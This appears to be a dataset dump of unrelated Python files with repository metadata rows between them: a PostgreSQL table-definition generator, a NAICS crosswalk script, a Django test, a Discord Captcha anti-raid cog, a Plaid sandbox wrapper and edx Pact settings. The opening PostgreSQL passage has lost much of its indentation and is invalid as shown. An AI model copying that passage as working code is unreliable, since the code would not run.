            query.append('WHERE ' + ' AND '.join(conditions))
        try:
            results = self.Execute(' '.join(query), True)
        except Exception as ex:
            raise RuntimeError('Failed to fetch table attributes. Reason: %s' % str(ex))
        # Return as derived TableObject. NOTE: populating the definition from
        # `results` is still unimplemented; GenerateTableDef requires a DataFrame
        # and cannot be called without arguments.
        out = PostGresTable(table, '', schema)
        return out
class PostGresTable(TableObject):
"""
* Contains column names and meta
attributes for PostGresSQL tables.
"""
def __init__(self, name, dbname, server):
"""
* Contains column names and meta
attributes for T-SQL tables.
"""
super().__init__(name, dbname, server, 'postgresql')
################
# Interface Methods:
################
@staticmethod
def GenerateTableDef(df, tablename, std_names = False, outpath = None, templatedef = False, template = None):
"""
* Convert passed dataframe with dtypes into
CREATE TABLE script with appropriate types for PostGresSQL.
Inputs:
* df: Pandas dataframe containing data to store in PostGresSQL table.
* tablename: string name for table.
Optional:
* std_names: lowercase all column names and replace with underscores.
* outpath: string path to output table definition.
* templatedef: put True to include a "template" table definition
with character varying as all types.
* template: path to file to insert table definition.
Must have one %s placed to indicate where to place
table definition.
"""
errs = []
if not isinstance(df, DataFrame):
errs.append('df must be a DataFrame.')
if not isinstance(tablename, str):
errs.append('tablename must be a string.')
if not isinstance(std_names, bool):
errs.append('std_names must be boolean.')
        if outpath is not None and not isinstance(outpath, str):
            errs.append('outpath must be a string if provided.')
        elif outpath is not None and not outpath.endswith('\\'):
            outpath += '\\'
if not template is None:
if not isinstance(template, str):
errs.append('template must be a string path if provided.')
elif not os.path.exists(template):
errs.append('template does not exist at path.')
if not isinstance(templatedef, bool):
errs.append('templatedef must be boolean.')
if errs:
raise ValueError('\n'.join(errs))
if std_names:
df = ColumnAttributesGenerator.StandardizeNames(df)
# Convert types:
types = PostGresColumnConverter.GetColumnTypes(df)
attributes = PostGresColumnConverter.GetColumnAttributes(df)
definition = ['CREATE TABLE %s' % tablename, '(']
if templatedef:
t_definition = ['CREATE TABLE %s_template' % tablename, '(']
for num, col in enumerate(types):
attr = attributes[col]
            nullable = '' if attr['nullable'] else ' NOT NULL'
            definition.append('%s %s%s%s' % (col, types[col], nullable, ',' if num != len(types) - 1 else ''))
if templatedef:
t_definition.append('%s character varying%s' % (col,',' if num != len(types) - 1 else ''))
        definition.append(')')
        if templatedef:
            t_definition.append(')')
            definition.append('\n')
            definition.extend(t_definition)
if not outpath is None:
with open('%s%s.sql' % (outpath, tablename), 'w') as f:
f.write('\n'.join(definition))
else:
return '\n'.join(definition)
def ImportTableDef(self, path):
"""
* Import table definition using
file.
"""
pass
def ReadDefinitionFile(self, path):
"""
* Convert table definition file
into TableObject.
"""
pass
################
# Private Helpers:
################
############################
# Table Class:
############################
class PostGresColumnConverter(ColumnAttributesGenerator):
"""
* Map numpy dtypes to postgresql
types and attributes for usage in creating tables.
"""
# https://www.postgresql.org/docs/9.5/datatype.html
__conversionTable = {'i':{'8' : 'bigint', '4':'integer', '2':'smallint'},
'u':{'8' : 'bigint', '4':'integer', '2':'smallint'},
'b':'bool',
'f':{'8':'double precision','4':'real'},
'c':'character varying',
'm':'character varying',
'M':'character varying',
'O':'character varying',
'S':'character varying',
'U':'character varying UTF8',
'V':' ',
'?':' '}
@staticmethod
def GetColumnTypes(df):
"""
* Get column types appropriate for PostGreSQL from
numpy dtypes.
"""
if not isinstance(df, (DataFrame, Series)):
raise ValueError('df must be a pandas DataFrame or Series.')
out = {}
tps = ColumnAttributesGenerator.GetColumnTypes(df)
        # Normalize: the base class yields (name, dtype-string) pairs for a
        # DataFrame and is assumed to yield a single pair for a Series; handle
        # both with one loop instead of the duplicated branches.
        cells = tps if isinstance(df, DataFrame) else [tps]
        for cell in cells:
            name = cell[0]
            nptp = cell[1]
            if '<' in nptp:
                nptp = nptp.replace('<', '')
                prec = nptp[1:]
                nptp = nptp[0]
                tp = PostGresColumnConverter.__conversionTable[nptp][prec]
            elif 'O' in nptp:
                nptp = nptp.replace('|', '') if '|' in nptp else nptp
                tp = PostGresColumnConverter.__conversionTable[nptp]
                column = df[name] if isinstance(df, DataFrame) else df
                max_len = ColumnAttributesGenerator.GetMaxStringLen(column)
                tp = '%s(%s)' % (tp, max_len)
            else:
                tp = PostGresColumnConverter.__conversionTable[nptp]
            out[name] = tp
        return out
@staticmethod
def GetColumnAttributes(df):
"""
* Get column attributes from dataframe.
"""
return ColumnAttributesGenerator.GetColumnAttributes(df)
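    # Illustrative mapping examples (dtype kind/itemsize -> PostgreSQL type),
    # derived from __conversionTable above; the column contents are hypothetical:
    #
    #     int64   ('i', '8')              -> bigint
    #     float32 ('f', '4')              -> real
    #     bool    ('b')                   -> bool
    #     object  ('O', max str len 12)   -> character varying(12)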
df = read_csv(r'C:\Shared\ETF Global\Projects\indexiq funds and basket dags\indexiq_dags\cleaned\IndexIQ_04302021_processed_constituents.csv')
df = df[[col for col in df.columns if not 'Unnamed: ' in col]]
PostGresTable.GenerateTableDef(df,'index_holdings',True,r'C:\Shared\ETF Global\Projects\indexiq funds and basket dags',True) | 37.052 | 142 | 0.542049 | 916 | 9,263 | 5.429039 | 0.257642 | 0.016087 | 0.02413 | 0.013071 | 0.207722 | 0.139151 | 0.11301 | 0.086065 | 0.063141 | 0.063141 | 0 | 0.004979 | 0.327864 | 9,263 | 250 | 143 | 37.052 | 0.793768 | 0.175861 | 0 | 0.290541 | 0 | 0.006757 | 0.143497 | 0.020376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060811 | false | 0.033784 | 0.040541 | 0 | 0.162162 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df2df1da0ca98a017a823acaaefd712f2d812056 | 2,612 | py | Python | scripts/write_NAICS_07_to_17_Crosswalk.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | scripts/write_NAICS_07_to_17_Crosswalk.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | scripts/write_NAICS_07_to_17_Crosswalk.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | # write_NAICS_from_Census.py (scripts)
# !/usr/bin/env python3
# coding=utf-8
"""
Uses a csv file manually loaded, originally from USEEIOR (4/18/2020), to form base NAICS crosswalk from 2007-2017
Loops through the source crosswalks to find any NAICS codes not in the official Census NAICS code list, and adds
them to the NAICS crosswalk.
- Writes reshaped file to datapath as csv.
"""
from flowsa.common import datapath
import glob
import pandas as pd
#from rpy2.robjects.packages import importr
#from rpy2.robjects import pandas2ri
# does not work due to issues with rpy2. Crosswalk was manually copied from useeior and added as csv (4/18/2020)
# pandas2ri.activate()
# useeior = importr('useeior')
# NAICS_crosswalk = useeior.getMasterCrosswalk(2012)
# NAICS_crosswalk = pandas2ri.ri2py_dataframe(NAICS_crosswalk)
# update the useeior crosswalk with crosswalks created for flowsa datasets
# read the csv loaded as a raw datafile
naics = pd.read_csv(datapath + "NAICS_useeior_Crosswalk.csv")
naics = naics[naics['NAICS_2007_Code'].notna()]
# convert all rows to string
naics = naics.astype(str)
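# At this point `naics` holds one row per code lineage, e.g. (values illustrative):
#   NAICS_2007_Code  NAICS_2012_Code  NAICS_2017_Code
#   111110           111110           111110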
missing_naics_df_list = []
# read in all the crosswalk csv files (ends in toNAICS.csv)
for file_name in glob.glob(datapath + "activitytosectormapping/"+'*_toNAICS.csv'):
df = pd.read_csv(file_name, low_memory=False)
# determine sector year
naics_year = df['SectorSourceName'].all()
# subset dataframe so only sector
df = df[['Sector']]
# trim whitespace and cast as string, rename column
df['Sector'] = df['Sector'].astype(str).str.strip()
df = df.rename(columns={'Sector': naics_year})
# extract sector year column from master crosswalk
df_naics = naics[[naics_year]]
    # find any NAICS that are in the source crosswalk but not in the master crosswalk
    common = df.merge(df_naics, on=naics_year)
    missing_naics = df[~df[naics_year].isin(common[naics_year])]
# append to df list
missing_naics_df_list.append(missing_naics)
# concat df list and drop duplications
missing_naics_df = pd.concat(missing_naics_df_list, ignore_index=True, sort=True).drop_duplicates()
# sort df
missing_naics_df = missing_naics_df.sort_values(['NAICS_2012_Code', 'NAICS_2007_Code'])
missing_naics_df = missing_naics_df.reset_index(drop=True)
# add missing naics to master naics crosswalk
total_naics = naics.append(missing_naics_df, sort=True)
# sort df
total_naics = total_naics.sort_values(['NAICS_2012_Code', 'NAICS_2007_Code'])
# save as csv
total_naics.to_csv(datapath + "NAICS_07_to_17_Crosswalk.csv", index=False)
| 37.855072 | 118 | 0.761103 | 395 | 2,612 | 4.848101 | 0.344304 | 0.075196 | 0.073107 | 0.028198 | 0.098172 | 0.098172 | 0.06893 | 0.037598 | 0 | 0 | 0 | 0.026257 | 0.13974 | 2,612 | 68 | 119 | 38.411765 | 0.82599 | 0.484686 | 0 | 0 | 0 | 0 | 0.157895 | 0.060259 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df317360fd387a84ff0e026f66ae71e5d980bda4 | 495 | py | Python | djexperience/crm/tests/test_model_phoneemployee.py | rg3915/django-experience-2016 | 76adaa55c537f3b9fa48b601d4a97fd6e04371c0 | [
"MIT"
] | 1 | 2022-01-01T22:19:49.000Z | 2022-01-01T22:19:49.000Z | djexperience/crm/tests/test_model_phoneemployee.py | rg3915/django-experience-2016 | 76adaa55c537f3b9fa48b601d4a97fd6e04371c0 | [
"MIT"
] | null | null | null | djexperience/crm/tests/test_model_phoneemployee.py | rg3915/django-experience-2016 | 76adaa55c537f3b9fa48b601d4a97fd6e04371c0 | [
"MIT"
] | null | null | null | from django.test import TestCase
from djexperience.crm.models import PhoneEmployee, Employee
from .data import EMPLOYEE_DICT
class PhoneEmployeeTest(TestCase):
def setUp(self):
self.employee = Employee.objects.create(**EMPLOYEE_DICT)
phone = PhoneEmployee(
phone='11 98765-4321',
employee=self.employee,
phone_type='pri'
)
phone.save()
def test_create(self):
self.assertTrue(PhoneEmployee.objects.exists())
| 26.052632 | 64 | 0.664646 | 53 | 495 | 6.132075 | 0.528302 | 0.073846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029333 | 0.242424 | 495 | 18 | 65 | 27.5 | 0.837333 | 0 | 0 | 0 | 0 | 0 | 0.032323 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df39fdc57b5a830b3a9e319ad857dd37de453a65 | 680 | py | Python | examples/miniapps/movie-lister/movies/__main__.py | JarnoRFB/python-dependency-injector | 39f3f3a6232d846980cdf7fd106490751210d4f0 | [
"BSD-3-Clause"
] | null | null | null | examples/miniapps/movie-lister/movies/__main__.py | JarnoRFB/python-dependency-injector | 39f3f3a6232d846980cdf7fd106490751210d4f0 | [
"BSD-3-Clause"
] | null | null | null | examples/miniapps/movie-lister/movies/__main__.py | JarnoRFB/python-dependency-injector | 39f3f3a6232d846980cdf7fd106490751210d4f0 | [
"BSD-3-Clause"
] | null | null | null | """Main module."""
import sys
from dependency_injector.wiring import Provide
from .listers import MovieLister
from .containers import Container
def main(lister: MovieLister = Provide[Container.lister]) -> None:
print('Francis Lawrence movies:')
for movie in lister.movies_directed_by('Francis Lawrence'):
print('\t-', movie)
print('2016 movies:')
for movie in lister.movies_released_in(2016):
print('\t-', movie)
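# A config.yml consumed below might look like this (keys assumed from this
# example app, not verified against its repository):
#
#     finder:
#       type: csv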
if __name__ == '__main__':
container = Container()
container.config.from_yaml('config.yml')
container.config.finder.type.from_env('MOVIE_FINDER_TYPE')
container.wire(modules=[sys.modules[__name__]])
main()
| 24.285714 | 66 | 0.704412 | 83 | 680 | 5.518072 | 0.457831 | 0.065502 | 0.061135 | 0.069869 | 0.122271 | 0.122271 | 0 | 0 | 0 | 0 | 0 | 0.014109 | 0.166176 | 680 | 27 | 67 | 25.185185 | 0.793651 | 0.017647 | 0 | 0.117647 | 0 | 0 | 0.140483 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.294118 | 0.235294 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3a80c657f7daf93c46d3e63b16bbedbda7ac9e | 16,502 | py | Python | captcha/base.py | Kami-DiscordBot/Predeactor-Cogs | a3b6a38a7440b58c6b229e5aa07d66f52d128eae | [
"Apache-2.0"
] | 18 | 2020-06-19T22:46:19.000Z | 2022-01-30T12:59:16.000Z | captcha/base.py | Kami-DiscordBot/Predeactor-Cogs | a3b6a38a7440b58c6b229e5aa07d66f52d128eae | [
"Apache-2.0"
] | 39 | 2020-03-09T13:36:25.000Z | 2021-08-19T00:41:39.000Z | captcha/base.py | Kami-DiscordBot/Predeactor-Cogs | a3b6a38a7440b58c6b229e5aa07d66f52d128eae | [
"Apache-2.0"
] | 17 | 2020-08-06T21:47:19.000Z | 2021-11-04T20:42:57.000Z | import logging
from contextlib import suppress
from datetime import datetime
from typing import Optional, Union
import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
from redbot.core.utils.chat_formatting import bold, error, humanize_list
from .abc import CompositeMetaClass
from .api import Challenge
from .commands import OwnerCommands, Settings
from .errors import (
AlreadyHaveCaptchaError,
AskedForReload,
DeletedValueError,
LeftServerError,
MissingRequiredValueError,
)
from .events import Listeners
from .informations import (
__author__,
__patchnote__,
__patchnote_version__,
__version__,
)
from .utils import build_kick_embed
DEFAULT_GLOBAL = {"log_level": 50}
DEFAULT_GUILD = {
"channel": None, # The channel where the captcha is sent.
"logschannel": None, # Where logs are sent.
"enabled": False, # If challenges must be activated.
"autoroles": [], # Roles to give.
"temprole": None, # Temporary role to give.
"type": "plain", # Captcha type.
"timeout": 5, # Time in minutes before kicking.
"retry": 3, # The numnber of retry allowed.
}
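# Per-guild values are read and written through Red's Config API, e.g.
# (illustrative calls, not taken from this file):
#
#     timeout = await self.data.guild(guild).timeout()
#     await self.data.guild(guild).retry.set(5)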
log = logging.getLogger("red.predeactor.captcha")
class Captcha(
Settings,
OwnerCommands,
Listeners,
commands.Cog,
name="Captcha",
metaclass=CompositeMetaClass,
):
"""A Captcha defensive system. to challenge the new users and protect yourself a bit more of
raids."""
def __init__(self, bot: Red) -> None:
super().__init__()
self.bot: Red = bot
self.data: Config = Config.get_conf(None, identifier=495954056, cog_name="Captcha")
self.data.register_global(**DEFAULT_GLOBAL)
self.data.register_guild(**DEFAULT_GUILD)
self.running = {}
self.version = __version__
self.patchnote = __patchnote__
self.patchnoteconfig = None
async def send_or_update_log_message(
self,
guild: discord.Guild,
message_content: str,
message_to_update: Optional[discord.Message] = None,
*,
allowed_tries: tuple = None,
member: discord.Member = None,
file: discord.File = None,
embed: discord.Embed = None,
ignore_error: bool = True,
) -> Optional[discord.Message]:
"""
Send a message or update one in the log channel.
"""
time = datetime.now().strftime("%H:%M - %w/%d/%Y")
content = ""
if message_to_update:
content += message_to_update.content + "\n"
content += (
f"{bold(str(time))}{f' {member.mention}' if member else ''}"
f"{f' ({allowed_tries[0]}/{allowed_tries[1]})' if allowed_tries else ''}: "
f"{message_content}"
)
log_channel_id: Union[int, None] = await self.data.guild(guild).logschannel()
if not log_channel_id:
if ignore_error:
return None
raise MissingRequiredValueError("Missing logging channel ID.")
log_channel: discord.TextChannel = self.bot.get_channel(log_channel_id)
if log_channel and message_to_update:
try:
await message_to_update.edit(
content=content,
file=file,
embed=embed,
allowed_mentions=discord.AllowedMentions(users=False),
)
except discord.HTTPException:
if message_to_update.embeds and (
message_to_update.embeds[0].title == "Message reached his maximum capacity!"
):
# To avoid edit spam or something... smh
return message_to_update
await message_to_update.edit(
content=message_to_update.content,
file=file,
embed=discord.Embed(
colour=discord.Colour.red().value,
title="Message reached his maximum capacity!",
description=(
"I am unable to log more since the characters limit on this "
"message has been reached."
),
),
allowed_mentions=discord.AllowedMentions(users=False),
)
return message_to_update
if log_channel:
return await log_channel.send(
content,
file=file,
embed=embed,
allowed_mentions=discord.AllowedMentions(users=False),
)
raise DeletedValueError("Logging channel may have been deleted.")
async def basic_check(self, member: discord.Member) -> bool:
"""
        Run basic checks on a member; used when a member joins the server.
"""
if member.bot:
return False
if await self.bot.cog_disabled_in_guild(self, member.guild):
return False
return await self.data.guild(member.guild).enabled()
async def create_challenge_for(self, member: discord.Member) -> Challenge:
"""
        Create a Challenge object for a user and append it to the running challenges.
"""
if member.id in self.running:
raise AlreadyHaveCaptchaError("The user already have a captcha object running.")
captcha = Challenge(self.bot, member, await self.data.guild(member.guild).all())
self.running[member.id] = captcha
return captcha
async def delete_challenge_for(self, member: discord.Member) -> bool:
try:
del self.running[member.id]
return True
except KeyError:
return False
def is_running_challenge(self, member_or_id: Union[discord.Member, int]) -> bool:
if isinstance(member_or_id, discord.Member):
member_or_id = int(member_or_id.id)
return member_or_id in self.running
def obtain_challenge(self, member_or_id: Union[discord.Member, int]) -> Challenge:
if isinstance(member_or_id, discord.Member):
member_or_id = int(member_or_id.id)
if not self.is_running_challenge(member_or_id):
raise KeyError("User is not challenging any Captcha.")
return self.running[member_or_id]
async def give_temprole(self, challenge: Challenge) -> None:
temprole = challenge.config["temprole"]
if temprole:
try:
await challenge.member.add_roles(
challenge.guild.get_role(temprole), reason="Beginning Captcha challenge."
)
except discord.Forbidden:
raise PermissionError('Bot miss the "manage_roles" permission.')
async def remove_temprole(self, challenge: Challenge) -> None:
temprole = challenge.config["temprole"]
if temprole:
try:
await challenge.member.remove_roles(
challenge.guild.get_role(temprole), reason="Finishing Captcha challenge."
)
except discord.Forbidden:
raise PermissionError('Bot miss the "manage_roles" permission.')
async def realize_challenge(self, challenge: Challenge) -> bool:
# Seems to be the last goddamn function I'll be writing...
limit = await self.data.guild(challenge.member.guild).retry()
is_ok = None
timeout = False
await self.give_temprole(challenge)
try:
while is_ok is not True:
if challenge.trynum > limit:
break
try:
this = await challenge.try_challenging()
except TimeoutError:
timeout = True
break
except AskedForReload:
challenge.trynum += 1
continue
except LeftServerError:
return False
except TypeError:
                    # Here the user reacted with an invalid (most probably custom)
                    # emoji. While I expect administrators to remove that permission,
                    # it still needs handling; we're fine not increasing trynum.
continue
if this is False:
challenge.trynum += 1
try:
await challenge.messages["answer"].delete()
except discord.Forbidden:
await self.send_or_update_log_message(
challenge.guild,
error(bold("Unable to delete member's answer.")),
challenge.messages.get("logs"),
member=challenge.member,
)
is_ok = False
else:
is_ok = True
failed = challenge.trynum > limit
logmsg = challenge.messages["logs"]
if failed or timeout:
reason = (
"Retried the captcha too many time."
if failed
else "Didn't answer to the challenge."
)
try:
await self.nicely_kick_user_from_challenge(challenge, reason)
await self.send_or_update_log_message(
challenge.guild,
bold(f"User kicked for reason: {reason}"),
logmsg,
member=challenge.member,
)
except PermissionError:
await self.send_or_update_log_message(
challenge.guild,
error(bold("Permission missing for kicking member!")),
logmsg,
member=challenge.member,
)
return True
roles = [
challenge.guild.get_role(role)
for role in await self.data.guild(challenge.guild).autoroles()
]
try:
await self.congratulation(challenge, roles)
await self.remove_temprole(challenge)
await self.send_or_update_log_message(
challenge.guild,
bold("Roles added, Captcha passed."),
logmsg,
member=challenge.member,
)
except PermissionError:
roles_name = [role.name for role in roles]
try:
await challenge.member.send(
f"Please contact the administrator of {challenge.guild.name} for obtaining "
"access of the server, I was unable to add you the roles on the server.\nYou "
f"should have obtained the following roles: "
f"{humanize_list(roles_name) if roles_name else 'None.'}"
)
except discord.Forbidden:
await challenge.channel.send(
challenge.member.mention
+ ": "
+ f"Please contact the administrator of {challenge.guild.name} for obtaining "
"access of the server, I was unable to add you the roles on the server.\nYou "
f"should have obtained the following roles: "
f"{humanize_list(roles_name) if roles_name else 'None.'}",
delete_after=10,
)
await self.send_or_update_log_message(
challenge.guild,
error(bold("Permission missing for giving roles! Member alerted.")),
logmsg,
member=challenge.member,
)
finally:
try:
await challenge.cleanup_messages()
except PermissionError:
await self.send_or_update_log_message(
challenge.guild,
error(bold("Missing permissions for deleting all messages for verification!")),
challenge.messages.get("logs"),
member=challenge.member,
)
return True
async def congratulation(self, challenge: Challenge, roles: list) -> None:
"""
Congrats to a member! He finished the captcha!
"""
# Admin may have set channel to be DM, checking for manage_roles is useless since
# it always return False, instead, we're taking a random text channel of the guild
# to check our permission for kicking.
channel = (
challenge.channel
if not isinstance(challenge.channel, discord.DMChannel)
else challenge.guild.text_channels[0]
)
if not channel.permissions_for(self.bot.get_guild(challenge.guild.id).me).manage_roles:
raise PermissionError('Bot miss the "manage_roles" permission.')
await challenge.member.add_roles(*roles, reason="Passed Captcha successfully.")
async def nicely_kick_user_from_challenge(self, challenge: Challenge, reason: str) -> bool:
# We're gonna check our permission first, to avoid DMing the user for nothing.
# Admin may have set channel to be DM, checking for kick_members is useless since
# it always return False, instead, we're taking a random text channel of the guild
# to check our permission for kicking.
channel = (
challenge.channel
if not isinstance(challenge.channel, discord.DMChannel)
else challenge.guild.text_channels[0]
)
if not channel.permissions_for(self.bot.get_guild(challenge.guild.id).me).kick_members:
raise PermissionError('Bot miss the "kick_members" permission.')
with suppress(discord.Forbidden, discord.HTTPException):
await challenge.member.send(embed=build_kick_embed(challenge.guild, reason))
try:
await challenge.guild.kick(challenge.member, reason=reason)
except discord.Forbidden:
raise PermissionError("Unable to kick member.")
return True
# PLEASE DON'T TOUCH THOSE FUNCTIONS WITH YOUR COG OR EVAL. Thanks. - Pred
# Those should only be used by the cog - 4 bags of None of your business.
def format_help_for_context(self, ctx: commands.Context) -> str:
"""
This will put some text at the top of the main help. ([p]help Captcha)
        Thanks to Sinbad.
"""
pre_processed = super().format_help_for_context(ctx)
return "{pre_processed}\n\nAuthor: {authors}\nVersion: {version}".format(
pre_processed=pre_processed,
authors=humanize_list(__author__),
version=self.version,
)
async def _initialize(self, send_patchnote: bool = True) -> None:
"""
An initializer for the cog.
It just set the logging level and send the patchnote if asked.
"""
log_level = await self.data.log_level()
log.setLevel(log_level)
log.info("Captcha logging level has been set to: {lev}".format(lev=log_level))
log.debug(
"This logging level is reserved for testing and monitoring purpose, set the "
"level to 2 if you prefer to be alerted by less minor events or doesn't want to help "
"debugging this cog."
)
if send_patchnote:
await self._send_patchnote()
async def _send_patchnote(self) -> None:
await self.bot.wait_until_red_ready()
self.patchnoteconfig = notice = Config.get_conf(
None,
identifier=4145125452,
cog_name="PredeactorNews",
)
notice.register_user(version="0")
async with notice.get_users_lock():
old_patchnote_version: str = await notice.user(self.bot.user).version()
if old_patchnote_version != __patchnote_version__:
log.info("New version of patchnote detected! Delivering... (¬‿¬ )")
await self.bot.send_to_owners(self.patchnote)
await notice.user(self.bot.user).version.set(__patchnote_version__)
def setup(bot: Red):
cog = Captcha(bot)
bot.add_cog(cog)
# noinspection PyProtectedMember
bot.loop.create_task(cog._initialize())
| 40.64532 | 102 | 0.574536 | 1,762 | 16,502 | 5.237798 | 0.212259 | 0.019504 | 0.017878 | 0.011377 | 0.352693 | 0.30545 | 0.263626 | 0.238054 | 0.232528 | 0.222993 | 0 | 0.003247 | 0.346746 | 16,502 | 405 | 103 | 40.745679 | 0.852597 | 0.081202 | 0 | 0.292169 | 0 | 0 | 0.138282 | 0.012565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01506 | false | 0.006024 | 0.045181 | 0 | 0.114458 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3df25b4492d882101df69a106581e2eacb1d2f | 2,392 | py | Python | frappe-bench/env/lib/python2.7/site-packages/plaid/api/sandbox.py | ibrahmm22/library-management | b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506 | [
"MIT"
] | null | null | null | frappe-bench/env/lib/python2.7/site-packages/plaid/api/sandbox.py | ibrahmm22/library-management | b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506 | [
"MIT"
] | null | null | null | frappe-bench/env/lib/python2.7/site-packages/plaid/api/sandbox.py | ibrahmm22/library-management | b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506 | [
"MIT"
] | null | null | null | from plaid.api.api import API
class Item(API):
'''Sandbox item endpoints.'''
def reset_login(self, access_token):
'''
Put an item into an ITEM_LOGIN_REQUIRED error state.
:param str access_token:
'''
return self.client.post('/sandbox/item/reset_login', {
'access_token': access_token,
})
def fire_webhook(self, access_token, webhook_code):
'''
Fire a webhook for an item
:param str access_token:
:param str webhook_code:
'''
return self.client.post('/sandbox/item/fire_webhook', {
'access_token': access_token,
'webhook_code': webhook_code,
})
class PublicToken(API):
'''Sandbox public token endpoints.'''
def create(self,
institution_id,
initial_products,
_options=None,
webhook=None,
transactions__start_date=None,
transactions__end_date=None,
):
'''
Generate a public token for sandbox testing.
:param str institution_id:
:param [str] initial_products:
:param str webhook:
'''
options = _options or {}
if webhook is not None:
options['webhook'] = webhook
transaction_options = {}
transaction_options.update(options.get('transactions', {}))
if transactions__start_date is not None:
transaction_options['start_date'] = transactions__start_date
if transactions__end_date is not None:
transaction_options['end_date'] = transactions__end_date
if transaction_options:
options['transactions'] = transaction_options
return self.client.post_public_key('/sandbox/public_token/create', {
'institution_id': institution_id,
'initial_products': initial_products,
'options': options,
})
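    # Example call (a sketch; the institution id and product list are assumptions):
    #
    #     client.Sandbox.public_token.create('ins_109508', ['transactions'])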
class Sandbox(API):
'''
Sandbox-only endpoints.
(`HTTP docs <https://plaid.com/docs/api/#sandbox>`__)
These endpoints may not be used in other environments.
.. autoclass:: plaid.api.sandbox.Item
:members:
'''
def __init__(self, client):
super(Sandbox, self).__init__(client)
self.item = Item(client)
self.public_token = PublicToken(client)
| 27.813953 | 76 | 0.589465 | 247 | 2,392 | 5.433198 | 0.279352 | 0.065574 | 0.035768 | 0.044709 | 0.092399 | 0.092399 | 0 | 0 | 0 | 0 | 0 | 0 | 0.313127 | 2,392 | 85 | 77 | 28.141176 | 0.816799 | 0.231187 | 0 | 0.121951 | 0 | 0 | 0.119643 | 0.047024 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.02439 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df3e3ee51a546d9823688523e9951c6bf395670b | 483 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/envs/pact.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/envs/pact.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/envs/pact.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
Settings for Pact Verification Tests.
"""
from .test import * # pylint: disable=wildcard-import, unused-wildcard-import
#### Allow Pact Provider States URL ####
PROVIDER_STATES_URL = True
#### Default User name for Pact Requests Authentication #####
MOCK_USERNAME = 'Mock User'
######################### Add Authentication Middleware for Pact Verification Calls #########################
MIDDLEWARE = MIDDLEWARE + ['common.test.pacts.middleware.AuthenticationMiddleware', ]
